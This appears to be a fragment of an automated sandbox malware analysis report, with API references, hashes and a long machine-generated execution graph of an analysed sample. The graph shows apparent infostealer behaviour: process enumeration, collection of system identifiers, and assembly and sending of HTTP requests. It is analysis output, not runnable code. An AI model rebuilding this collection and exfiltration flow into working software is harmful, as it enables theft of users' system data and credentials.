                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6E8162F4,00000000,6E813F27,?,00000000,?,00000000), ref: 6E815F32
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E8162F4,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094), ref: 6E815F58
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6E81631F,00000000,6E813F27,?,00000000,?,00000000), ref: 6E815E49
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E81631F,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094), ref: 6E815E6F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E80BCFA
                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 6E80BDE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 3761405300-246349140
                                                                                                                                                                    • Opcode ID: 15025a216d3f5a4efd1e0b521aecfeeef5f34362f4c6229d1d2f4bfce570f017
                                                                                                                                                                    • Instruction ID: ee0c6cd3ae3824fa4a21a6f937250f4fe64e451e11422dd4ab442c613063dd32
                                                                                                                                                                    • Opcode Fuzzy Hash: 15025a216d3f5a4efd1e0b521aecfeeef5f34362f4c6229d1d2f4bfce570f017
                                                                                                                                                                    • Instruction Fuzzy Hash: 2721DFB5596B019EFB50CF5DEA92B423BA4BB4B754F10442AED4D8ABD0F3B05880CB81

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:4.6%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:30
76735->76736 76737 4047e8 3 API calls 76736->76737 76738 40456f 76737->76738 76739 4047e8 3 API calls 76738->76739 76740 404586 76739->76740 76741 4047e8 3 API calls 76740->76741 76742 40459d 76741->76742 76743 4047e8 3 API calls 76742->76743 76744 4045b4 76743->76744 76745 4047e8 3 API calls 76744->76745 76746 4045cb 76745->76746 76747 4047e8 3 API calls 76746->76747 76748 4045e2 76747->76748 76749 4047e8 3 API calls 76748->76749 76750 4045f9 76749->76750 76751 4047e8 3 API calls 76750->76751 76752 404612 76751->76752 76753 4047e8 3 API calls 76752->76753 76754 404629 76753->76754 76755 4047e8 3 API calls 76754->76755 76756 404642 76755->76756 76757 4047e8 3 API calls 76756->76757 76758 404656 76757->76758 76759 4047e8 3 API calls 76758->76759 76760 40466d 76759->76760 76761 4047e8 3 API calls 76760->76761 76762 404684 76761->76762 76763 4047e8 3 API calls 76762->76763 76764 40469b 76763->76764 76765 4047e8 3 API calls 76764->76765 76766 4046b2 76765->76766 76767 4047e8 3 API calls 76766->76767 76768 4046cc 76767->76768 76769 4047e8 3 API calls 76768->76769 76770 4046e3 76769->76770 76771 4047e8 3 API calls 76770->76771 76772 4046f9 76771->76772 76773 4047e8 3 API calls 76772->76773 76774 404710 76773->76774 76775 4047e8 3 API calls 76774->76775 76776 404727 76775->76776 76777 4047e8 3 API calls 76776->76777 76778 40473d 76777->76778 76779 4047e8 3 API calls 76778->76779 76780 404754 76779->76780 76781 4047e8 3 API calls 76780->76781 76782 404768 76781->76782 76783 4047e8 3 API calls 76782->76783 76784 404781 76783->76784 76785 4047e8 3 API calls 76784->76785 76786 404797 76785->76786 76787 4047e8 3 API calls 76786->76787 76788 4047ae 76787->76788 76789 4047e8 3 API calls 76788->76789 76790 4047c5 76789->76790 76791 4047e8 3 API calls 76790->76791 76792 4047dc 76791->76792 76792->75800 78111 42f109 76793->78111 76795 41258e CreateToolhelp32Snapshot Process32First 76796 4125c2 Process32Next 76795->76796 76797 4125ef CloseHandle 76795->76797 76796->76797 76798 
4125d4 StrCmpCA 76796->76798 78112 42f165 76797->78112 76798->76796 76800 4125e6 76798->76800 76800->76796 76803 4104e7 lstrcpyA 76802->76803 76804 411c67 76803->76804 76805 4104e7 lstrcpyA 76804->76805 76806 411c75 GetSystemTime 76805->76806 76807 411c91 76806->76807 76808 41d016 __setmbcp_nolock 5 API calls 76807->76808 76809 411cc8 76808->76809 76809->75807 76812 4105e1 76810->76812 76811 410605 76811->75822 76812->76811 76813 4105f3 lstrcpyA lstrcatA 76812->76813 76813->76811 76815 410519 lstrcpyA 76814->76815 76816 401d07 76815->76816 76817 410519 lstrcpyA 76816->76817 76818 401d12 76817->76818 76819 410519 lstrcpyA 76818->76819 76820 401d1d 76819->76820 76821 410519 lstrcpyA 76820->76821 76822 401d34 76821->76822 76823 4169b6 76822->76823 76824 410549 2 API calls 76823->76824 76825 4169ec 76824->76825 76826 410549 2 API calls 76825->76826 76827 4169f9 76826->76827 76828 410549 2 API calls 76827->76828 76829 416a06 76828->76829 76830 4104e7 lstrcpyA 76829->76830 76831 416a13 76830->76831 76832 4104e7 lstrcpyA 76831->76832 76833 416a20 76832->76833 76834 4104e7 lstrcpyA 76833->76834 76835 416a2d 76834->76835 76836 4104e7 lstrcpyA 76835->76836 76837 416a3a 76836->76837 76838 4104e7 lstrcpyA 76837->76838 76839 416a47 76838->76839 76840 4104e7 lstrcpyA 76839->76840 76896 416a54 76840->76896 76843 416a98 StrCmpCA 76844 416af1 StrCmpCA 76843->76844 76843->76896 76845 416cd4 76844->76845 76844->76896 76848 41058d lstrcpyA 76845->76848 76849 416cdf 76848->76849 76851 4104e7 lstrcpyA 76849->76851 76852 416cec 76851->76852 76854 41058d lstrcpyA 76852->76854 76853 401cfd lstrcpyA 76853->76896 76889 416c2c 76854->76889 76855 4168c6 33 API calls 76855->76896 76856 41058d lstrcpyA 76856->76896 76857 4104e7 lstrcpyA 76858 416d0b 76857->76858 76860 41058d lstrcpyA 76858->76860 76859 416b51 StrCmpCA 76861 416baa StrCmpCA 76859->76861 76859->76896 76862 416d15 76860->76862 76863 416bc0 StrCmpCA 76861->76863 76864 416ca3 76861->76864 78124 416da2 76862->78124 76867 416c72 
76863->76867 76868 416bd6 StrCmpCA 76863->76868 76866 41058d lstrcpyA 76864->76866 76869 416cae 76866->76869 76873 41058d lstrcpyA 76867->76873 76870 416be8 StrCmpCA 76868->76870 76871 416c3e 76868->76871 76875 4104e7 lstrcpyA 76869->76875 76876 416c0a 76870->76876 76877 416bfa Sleep 76870->76877 76879 41058d lstrcpyA 76871->76879 76872 410519 lstrcpyA 76872->76896 76878 416c7d 76873->76878 76880 416cbb 76875->76880 76881 41058d lstrcpyA 76876->76881 76877->76896 76882 4104e7 lstrcpyA 76878->76882 76883 416c49 76879->76883 76885 41058d lstrcpyA 76880->76885 76886 416c15 76881->76886 76887 416c8a 76882->76887 76884 4104e7 lstrcpyA 76883->76884 76888 416c56 76884->76888 76885->76889 76890 4104e7 lstrcpyA 76886->76890 76892 41058d lstrcpyA 76887->76892 76893 41058d lstrcpyA 76888->76893 76889->76857 76894 416c22 76890->76894 76891 41683e 28 API calls 76891->76896 76892->76889 76893->76889 76895 41058d lstrcpyA 76894->76895 76895->76889 76896->76843 76896->76844 76896->76853 76896->76855 76896->76856 76896->76859 76896->76861 76896->76872 76896->76891 78115 4029f8 76896->78115 78118 402a09 76896->78118 78121 402a1a 76896->78121 78131 402a2b lstrcpyA 76896->78131 78132 402a3c lstrcpyA 76896->78132 78133 402a4d lstrcpyA 76896->78133 76897 416d28 76897->75833 76899 41058d lstrcpyA 76898->76899 76900 418257 76899->76900 76901 41058d lstrcpyA 76900->76901 76902 418262 76901->76902 76903 41058d lstrcpyA 76902->76903 76904 41826d 76903->76904 76904->75837 76906 410529 76905->76906 76907 41053e 76906->76907 76908 410536 lstrcpyA 76906->76908 76907->75850 76908->76907 76910 4109e6 GetVolumeInformationA 76909->76910 76911 4109df 76909->76911 76912 410a4d 76910->76912 76911->76910 76912->76912 76913 410a62 GetProcessHeap HeapAlloc 76912->76913 76914 410a7d 76913->76914 76915 410a8c wsprintfA lstrcatA 76913->76915 76916 4104e7 lstrcpyA 76914->76916 78134 411684 GetCurrentHwProfileA 76915->78134 76918 410a85 76916->76918 76922 41d016 __setmbcp_nolock 5 API calls 76918->76922 76919 
410ac7 lstrlenA 78150 4123d5 lstrcpyA malloc strncpy 76919->78150 76921 410aea lstrcatA 76924 410b01 76921->76924 76923 410b2e 76922->76923 76923->75877 76925 4104e7 lstrcpyA 76924->76925 76926 410b18 76925->76926 76926->76918 76928 410519 lstrcpyA 76927->76928 76929 404b59 76928->76929 78154 404ab6 76929->78154 76931 404b65 76932 4104e7 lstrcpyA 76931->76932 76933 404b81 76932->76933 76934 4104e7 lstrcpyA 76933->76934 76935 404b91 76934->76935 76936 4104e7 lstrcpyA 76935->76936 76937 404ba1 76936->76937 76938 4104e7 lstrcpyA 76937->76938 76939 404bb1 76938->76939 76940 4104e7 lstrcpyA 76939->76940 76941 404bc1 InternetOpenA StrCmpCA 76940->76941 76942 404bf5 76941->76942 76943 405194 InternetCloseHandle 76942->76943 76944 411c4a 7 API calls 76942->76944 76954 4051e1 76943->76954 76945 404c15 76944->76945 76946 4105c7 2 API calls 76945->76946 76947 404c28 76946->76947 76948 41058d lstrcpyA 76947->76948 76949 404c33 76948->76949 76950 410609 3 API calls 76949->76950 76951 404c5f 76950->76951 76952 41058d lstrcpyA 76951->76952 76953 404c6a 76952->76953 76955 410609 3 API calls 76953->76955 76956 41d016 __setmbcp_nolock 5 API calls 76954->76956 76957 404c8b 76955->76957 76958 405235 76956->76958 76959 41058d lstrcpyA 76957->76959 77060 4139c2 StrCmpCA 76958->77060 76960 404c96 76959->76960 76961 4105c7 2 API calls 76960->76961 76962 404cb8 76961->76962 76963 41058d lstrcpyA 76962->76963 76964 404cc3 76963->76964 76965 410609 3 API calls 76964->76965 76966 404ce4 76965->76966 76967 41058d lstrcpyA 76966->76967 76968 404cef 76967->76968 76969 410609 3 API calls 76968->76969 76970 404d10 76969->76970 76971 41058d lstrcpyA 76970->76971 76972 404d1b 76971->76972 76973 410609 3 API calls 76972->76973 76974 404d3d 76973->76974 76975 4105c7 2 API calls 76974->76975 76976 404d48 76975->76976 76977 41058d lstrcpyA 76976->76977 76978 404d53 76977->76978 76979 404d69 InternetConnectA 76978->76979 76979->76943 76980 404d97 HttpOpenRequestA 76979->76980 76981 404dd7 76980->76981 
76982 405188 InternetCloseHandle 76980->76982 76983 404dfb 76981->76983 76984 404ddf InternetSetOptionA 76981->76984 76982->76943 76985 410609 3 API calls 76983->76985 76984->76983 76986 404e11 76985->76986 76987 41058d lstrcpyA 76986->76987 76988 404e1c 76987->76988 76989 4105c7 2 API calls 76988->76989 76990 404e3e 76989->76990 76991 41058d lstrcpyA 76990->76991 76992 404e49 76991->76992 76993 410609 3 API calls 76992->76993 76994 404e6a 76993->76994 76995 41058d lstrcpyA 76994->76995 76996 404e75 76995->76996 76997 410609 3 API calls 76996->76997 76998 404e97 76997->76998 76999 41058d lstrcpyA 76998->76999 77000 404ea2 76999->77000 77001 410609 3 API calls 77000->77001 77002 404ec3 77001->77002 77003 41058d lstrcpyA 77002->77003 77004 404ece 77003->77004 77005 410609 3 API calls 77004->77005 77006 404eef 77005->77006 77007 41058d lstrcpyA 77006->77007 77008 404efa 77007->77008 77009 4105c7 2 API calls 77008->77009 77010 404f19 77009->77010 77011 41058d lstrcpyA 77010->77011 77012 404f24 77011->77012 77013 410609 3 API calls 77012->77013 77014 404f45 77013->77014 77015 41058d lstrcpyA 77014->77015 77016 404f50 77015->77016 77017 410609 3 API calls 77016->77017 77018 404f71 77017->77018 77019 41058d lstrcpyA 77018->77019 77020 404f7c 77019->77020 77021 4105c7 2 API calls 77020->77021 77022 404f9e 77021->77022 77023 41058d lstrcpyA 77022->77023 77024 404fa9 77023->77024 77025 410609 3 API calls 77024->77025 77026 404fca 77025->77026 77027 41058d lstrcpyA 77026->77027 77028 404fd5 77027->77028 77029 410609 3 API calls 77028->77029 77030 404ff7 77029->77030 77031 41058d lstrcpyA 77030->77031 77032 405002 77031->77032 77033 410609 3 API calls 77032->77033 77034 405023 77033->77034 77035 41058d lstrcpyA 77034->77035 77036 40502e 77035->77036 77037 410609 3 API calls 77036->77037 77038 40504f 77037->77038 77039 41058d lstrcpyA 77038->77039 77040 40505a 77039->77040 77041 4105c7 2 API calls 77040->77041 77042 405079 77041->77042 77043 41058d lstrcpyA 77042->77043 77044 
405084 77043->77044 77045 4104e7 lstrcpyA 77044->77045 77046 40509f 77045->77046 77047 4105c7 2 API calls 77046->77047 77048 4050b6 77047->77048 77049 4105c7 2 API calls 77048->77049 77050 4050c7 77049->77050 77051 41058d lstrcpyA 77050->77051 77052 4050d2 77051->77052 77053 4050e8 lstrlenA lstrlenA HttpSendRequestA 77052->77053 77054 40515c InternetReadFile 77053->77054 77055 405176 InternetCloseHandle 77054->77055 77058 40511c 77054->77058 77056 402920 77055->77056 77056->76982 77057 410609 3 API calls 77057->77058 77058->77054 77058->77055 77058->77057 77059 41058d lstrcpyA 77058->77059 77059->77058 77061 4139e1 ExitProcess 77060->77061 77062 4139e8 strtok_s 77060->77062 77063 413b48 77062->77063 77075 413a04 77062->77075 77063->75885 77064 413b2a strtok_s 77064->77063 77064->77075 77065 413a21 StrCmpCA 77065->77064 77065->77075 77066 413a75 StrCmpCA 77066->77064 77066->77075 77067 413ab4 StrCmpCA 77067->77064 77067->77075 77068 413af4 StrCmpCA 77068->77064 77069 413b16 StrCmpCA 77069->77064 77070 413a59 StrCmpCA 77070->77064 77070->77075 77071 413ac9 StrCmpCA 77071->77064 77071->77075 77072 413a3d StrCmpCA 77072->77064 77072->77075 77073 413a9f StrCmpCA 77073->77064 77073->77075 77074 413ade StrCmpCA 77074->77064 77075->77064 77075->77065 77075->77066 77075->77067 77075->77068 77075->77069 77075->77070 77075->77071 77075->77072 77075->77073 77075->77074 77076 410549 2 API calls 77075->77076 77076->77075 77078 410519 lstrcpyA 77077->77078 77079 405f64 77078->77079 77080 404ab6 5 API calls 77079->77080 77081 405f70 77080->77081 77082 4104e7 lstrcpyA 77081->77082 77083 405f8c 77082->77083 77084 4104e7 lstrcpyA 77083->77084 77085 405f9c 77084->77085 77086 4104e7 lstrcpyA 77085->77086 77087 405fac 77086->77087 77088 4104e7 lstrcpyA 77087->77088 77089 405fbc 77088->77089 77090 4104e7 lstrcpyA 77089->77090 77091 405fcc InternetOpenA StrCmpCA 77090->77091 77092 406000 77091->77092 77093 4066ff InternetCloseHandle 77092->77093 77094 411c4a 7 API calls 77092->77094 78160 
408048 CryptStringToBinaryA 77093->78160 77097 406020 77094->77097 77098 4105c7 2 API calls 77097->77098 77099 406033 77098->77099 77101 41058d lstrcpyA 77099->77101 77100 410549 2 API calls 77102 406739 77100->77102 77106 40603e 77101->77106 77103 410609 3 API calls 77102->77103 77104 406750 77103->77104 77105 41058d lstrcpyA 77104->77105 77111 40675b 77105->77111 77107 410609 3 API calls 77106->77107 77108 40606a 77107->77108 77109 41058d lstrcpyA 77108->77109 77110 406075 77109->77110 77114 410609 3 API calls 77110->77114 77112 41d016 __setmbcp_nolock 5 API calls 77111->77112 77113 4067eb 77112->77113 77244 41343f strtok_s 77113->77244 77115 406096 77114->77115 77116 41058d lstrcpyA 77115->77116 77117 4060a1 77116->77117 77118 4105c7 2 API calls 77117->77118 77119 4060c3 77118->77119 77120 41058d lstrcpyA 77119->77120 77121 4060ce 77120->77121 77122 410609 3 API calls 77121->77122 77123 4060ef 77122->77123 77124 41058d lstrcpyA 77123->77124 77125 4060fa 77124->77125 77126 410609 3 API calls 77125->77126 77127 40611b 77126->77127 77128 41058d lstrcpyA 77127->77128 77129 406126 77128->77129 77130 410609 3 API calls 77129->77130 77131 406148 77130->77131 77132 4105c7 2 API calls 77131->77132 77133 406153 77132->77133 77134 41058d lstrcpyA 77133->77134 77135 40615e 77134->77135 77136 406174 InternetConnectA 77135->77136 77136->77093 77137 4061a2 HttpOpenRequestA 77136->77137 77138 4061e2 77137->77138 77139 4066f3 InternetCloseHandle 77137->77139 77140 406206 77138->77140 77141 4061ea InternetSetOptionA 77138->77141 77139->77093 77142 410609 3 API calls 77140->77142 77141->77140 77143 40621c 77142->77143 77144 41058d lstrcpyA 77143->77144 77145 406227 77144->77145 77146 4105c7 2 API calls 77145->77146 77147 406249 77146->77147 77148 41058d lstrcpyA 77147->77148 77149 406254 77148->77149 77150 410609 3 API calls 77149->77150 77151 406275 77150->77151 77152 41058d lstrcpyA 77151->77152 77153 406280 77152->77153 77154 410609 3 API calls 77153->77154 77155 4062a2 
77154->77155 77156 41058d lstrcpyA 77155->77156 77157 4062ad 77156->77157 77158 410609 3 API calls 77157->77158 77159 4062cf 77158->77159 77160 41058d lstrcpyA 77159->77160 77161 4062da 77160->77161 77162 410609 3 API calls 77161->77162 77163 4062fb 77162->77163 77164 41058d lstrcpyA 77163->77164 77165 406306 77164->77165 77166 4105c7 2 API calls 77165->77166 77167 406325 77166->77167 77168 41058d lstrcpyA 77167->77168 77169 406330 77168->77169 77170 410609 3 API calls 77169->77170 77171 406351 77170->77171 77172 41058d lstrcpyA 77171->77172 77173 40635c 77172->77173 77174 410609 3 API calls 77173->77174 77175 40637d 77174->77175 77176 41058d lstrcpyA 77175->77176 77177 406388 77176->77177 77178 4105c7 2 API calls 77177->77178 77179 4063aa 77178->77179 77180 41058d lstrcpyA 77179->77180 77181 4063b5 77180->77181 77182 410609 3 API calls 77181->77182 77183 4063d6 77182->77183 77184 41058d lstrcpyA 77183->77184 77185 4063e1 77184->77185 77186 410609 3 API calls 77185->77186 77187 406403 77186->77187 77188 41058d lstrcpyA 77187->77188 77189 40640e 77188->77189 77190 410609 3 API calls 77189->77190 77191 40642f 77190->77191 77192 41058d lstrcpyA 77191->77192 77193 40643a 77192->77193 77194 410609 3 API calls 77193->77194 77195 40645b 77194->77195 77196 41058d lstrcpyA 77195->77196 77197 406466 77196->77197 77198 410609 3 API calls 77197->77198 77199 406487 77198->77199 77200 41058d lstrcpyA 77199->77200 77201 406492 77200->77201 77202 410609 3 API calls 77201->77202 77203 4064b3 77202->77203 77204 41058d lstrcpyA 77203->77204 77205 4064be 77204->77205 77206 410609 3 API calls 77205->77206 77207 4064df 77206->77207 77208 41058d lstrcpyA 77207->77208 77209 4064ea 77208->77209 77210 4105c7 2 API calls 77209->77210 77211 406506 77210->77211 77212 41058d lstrcpyA 77211->77212 77213 406511 77212->77213 77214 410609 3 API calls 77213->77214 77215 406532 77214->77215 77216 41058d lstrcpyA 77215->77216 77217 40653d 77216->77217 77218 410609 3 API calls 77217->77218 77219 40655f 
77218->77219 77220 41058d lstrcpyA 77219->77220 77221 40656a 77220->77221 77222 410609 3 API calls 77221->77222 77223 40658b 77222->77223 77224 41058d lstrcpyA 77223->77224 77225 406596 77224->77225 77226 410609 3 API calls 77225->77226 77227 4065b7 77226->77227 77228 41058d lstrcpyA 77227->77228 77229 4065c2 77228->77229 77230 4105c7 2 API calls 77229->77230 77231 4065e1 77230->77231 77232 41058d lstrcpyA 77231->77232 77233 4065ec 77232->77233 77234 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 77233->77234 78158 427050 77234->78158 77236 40663e lstrlenA lstrlenA 77237 427050 _memmove 77236->77237 77238 406667 lstrlenA HttpSendRequestA 77237->77238 77239 4066d2 InternetReadFile 77238->77239 77240 4066ec InternetCloseHandle 77239->77240 77242 406692 77239->77242 77240->77139 77241 410609 3 API calls 77241->77242 77242->77239 77242->77240 77242->77241 77243 41058d lstrcpyA 77242->77243 77243->77242 77245 4134cc 77244->77245 77249 41346e 77244->77249 77245->75900 77246 410549 2 API calls 77247 4134b6 strtok_s 77246->77247 77247->77245 77247->77249 77248 410549 2 API calls 77248->77249 77249->77246 77249->77247 77249->77248 77258 413286 77250->77258 77251 413332 StrCmpCA 77251->77258 77252 413385 77252->75913 77253 410549 2 API calls 77253->77258 77254 413367 strtok_s 77254->77258 77255 413301 StrCmpCA 77255->77258 77256 4132dc StrCmpCA 77256->77258 77257 4132ab StrCmpCA 77257->77258 77258->77251 77258->77252 77258->77253 77258->77254 77258->77255 77258->77256 77258->77257 77260 413434 77259->77260 77262 4133bc 77259->77262 77260->75926 77261 4133e2 StrCmpCA 77261->77262 77262->77261 77263 410549 2 API calls 77262->77263 77264 41341a strtok_s 77262->77264 77265 410549 2 API calls 77262->77265 77263->77264 77264->77260 77264->77262 77265->77262 77267 4104e7 lstrcpyA 77266->77267 77268 413b9f 77267->77268 77269 410609 3 API calls 77268->77269 77270 413baf 77269->77270 77271 41058d lstrcpyA 77270->77271 77272 413bb7 77271->77272 77273 410609 3 API calls 
77272->77273 77274 413bcf 77273->77274 77275 41058d lstrcpyA 77274->77275 77276 413bd7 77275->77276 77277 410609 3 API calls 77276->77277 77278 413bef 77277->77278 77279 41058d lstrcpyA 77278->77279 77280 413bf7 77279->77280 77281 410609 3 API calls 77280->77281 77282 413c0f 77281->77282 77283 41058d lstrcpyA 77282->77283 77284 413c17 77283->77284 77285 410609 3 API calls 77284->77285 77286 413c2f 77285->77286 77287 41058d lstrcpyA 77286->77287 77288 413c37 77287->77288 78165 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 77288->78165 77291 410609 3 API calls 77292 413c50 77291->77292 77293 41058d lstrcpyA 77292->77293 77294 413c58 77293->77294 77295 410609 3 API calls 77294->77295 77296 413c70 77295->77296 77297 41058d lstrcpyA 77296->77297 77298 413c78 77297->77298 77299 410609 3 API calls 77298->77299 77300 413c90 77299->77300 77301 41058d lstrcpyA 77300->77301 77302 413c98 77301->77302 78168 4115d4 77302->78168 77305 410609 3 API calls 77306 413cb1 77305->77306 77307 41058d lstrcpyA 77306->77307 77308 413cb9 77307->77308 77309 410609 3 API calls 77308->77309 77310 413cd1 77309->77310 77311 41058d lstrcpyA 77310->77311 77312 413cd9 77311->77312 77313 410609 3 API calls 77312->77313 77314 413cf1 77313->77314 77315 41058d lstrcpyA 77314->77315 77316 413cf9 77315->77316 77317 411684 11 API calls 77316->77317 77318 413d09 77317->77318 77319 4105c7 2 API calls 77318->77319 77320 413d16 77319->77320 77321 41058d lstrcpyA 77320->77321 77322 413d1e 77321->77322 77323 410609 3 API calls 77322->77323 77324 413d3e 77323->77324 77325 41058d lstrcpyA 77324->77325 77326 413d46 77325->77326 77327 410609 3 API calls 77326->77327 77328 413d5e 77327->77328 77329 41058d lstrcpyA 77328->77329 77330 413d66 77329->77330 77331 4109a2 19 API calls 77330->77331 77332 413d76 77331->77332 77333 4105c7 2 API calls 77332->77333 77334 413d83 77333->77334 77335 41058d lstrcpyA 77334->77335 77336 413d8b 77335->77336 77337 410609 3 API calls 77336->77337 77338 413dab 77337->77338 77339 
41058d lstrcpyA 77338->77339 77340 413db3 77339->77340 77341 410609 3 API calls 77340->77341 77342 413dcb 77341->77342 77343 41058d lstrcpyA 77342->77343 77344 413dd3 77343->77344 77345 413ddb GetCurrentProcessId 77344->77345 78175 41224a OpenProcess 77345->78175 77348 4105c7 2 API calls 77349 413df8 77348->77349 77350 41058d lstrcpyA 77349->77350 77351 413e00 77350->77351 77352 410609 3 API calls 77351->77352 77353 413e20 77352->77353 77354 41058d lstrcpyA 77353->77354 77355 413e28 77354->77355 77356 410609 3 API calls 77355->77356 77357 413e40 77356->77357 77358 41058d lstrcpyA 77357->77358 77359 413e48 77358->77359 77360 410609 3 API calls 77359->77360 77361 413e60 77360->77361 77362 41058d lstrcpyA 77361->77362 77363 413e68 77362->77363 77364 410609 3 API calls 77363->77364 77365 413e80 77364->77365 77366 41058d lstrcpyA 77365->77366 77367 413e88 77366->77367 78182 410b30 GetProcessHeap HeapAlloc 77367->78182 77370 410609 3 API calls 77371 413ea1 77370->77371 77372 41058d lstrcpyA 77371->77372 77373 413ea9 77372->77373 77374 410609 3 API calls 77373->77374 77375 413ec1 77374->77375 77376 41058d lstrcpyA 77375->77376 77377 413ec9 77376->77377 77378 410609 3 API calls 77377->77378 77379 413ee1 77378->77379 77380 41058d lstrcpyA 77379->77380 77381 413ee9 77380->77381 78189 411807 77381->78189 77384 4105c7 2 API calls 77385 413f06 77384->77385 77386 41058d lstrcpyA 77385->77386 77387 413f0e 77386->77387 77388 410609 3 API calls 77387->77388 77389 413f2e 77388->77389 77390 41058d lstrcpyA 77389->77390 77391 413f36 77390->77391 77392 410609 3 API calls 77391->77392 77393 413f4e 77392->77393 77394 41058d lstrcpyA 77393->77394 77395 413f56 77394->77395 78206 411997 77395->78206 77397 413f67 77398 4105c7 2 API calls 77397->77398 77399 413f75 77398->77399 77400 41058d lstrcpyA 77399->77400 77401 413f7d 77400->77401 77402 410609 3 API calls 77401->77402 77403 413f9d 77402->77403 77404 41058d lstrcpyA 77403->77404 77405 413fa5 77404->77405 77406 410609 3 API calls 
77405->77406 77407 413fbd 77406->77407 77408 41058d lstrcpyA 77407->77408 77409 413fc5 77408->77409 77410 410c85 3 API calls 77409->77410 77411 413fd2 77410->77411 77412 410609 3 API calls 77411->77412 77413 413fde 77412->77413 77414 41058d lstrcpyA 77413->77414 77415 413fe6 77414->77415 77416 410609 3 API calls 77415->77416 77417 413ffe 77416->77417 77418 41058d lstrcpyA 77417->77418 77419 414006 77418->77419 77420 410609 3 API calls 77419->77420 77421 41401e 77420->77421 77422 41058d lstrcpyA 77421->77422 77423 414026 77422->77423 78221 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 77423->78221 77425 414033 77426 410609 3 API calls 77425->77426 77427 41403f 77426->77427 77428 41058d lstrcpyA 77427->77428 77429 414047 77428->77429 77430 410609 3 API calls 77429->77430 77431 41405f 77430->77431 77432 41058d lstrcpyA 77431->77432 77433 414067 77432->77433 77434 410609 3 API calls 77433->77434 77435 41407f 77434->77435 77436 41058d lstrcpyA 77435->77436 77437 414087 77436->77437 78222 411563 7 API calls 77437->78222 77440 4105c7 2 API calls 77441 4140a6 77440->77441 77442 41058d lstrcpyA 77441->77442 77443 4140ae 77442->77443 77444 410609 3 API calls 77443->77444 77445 4140ce 77444->77445 77446 41058d lstrcpyA 77445->77446 77447 4140d6 77446->77447 77448 410609 3 API calls 77447->77448 77449 4140ee 77448->77449 77450 41058d lstrcpyA 77449->77450 77451 4140f6 77450->77451 78225 410ddb 77451->78225 77454 4105c7 2 API calls 77455 414113 77454->77455 77456 41058d lstrcpyA 77455->77456 77457 41411b 77456->77457 77458 410609 3 API calls 77457->77458 77459 41413b 77458->77459 77460 41058d lstrcpyA 77459->77460 77461 414143 77460->77461 77462 410609 3 API calls 77461->77462 77463 41415b 77462->77463 77464 41058d lstrcpyA 77463->77464 77465 414163 77464->77465 77466 410cc0 9 API calls 77465->77466 77467 414170 77466->77467 77468 410609 3 API calls 77467->77468 77469 41417c 77468->77469 77470 41058d lstrcpyA 77469->77470 77471 414184 77470->77471 77472 410609 3 API calls 
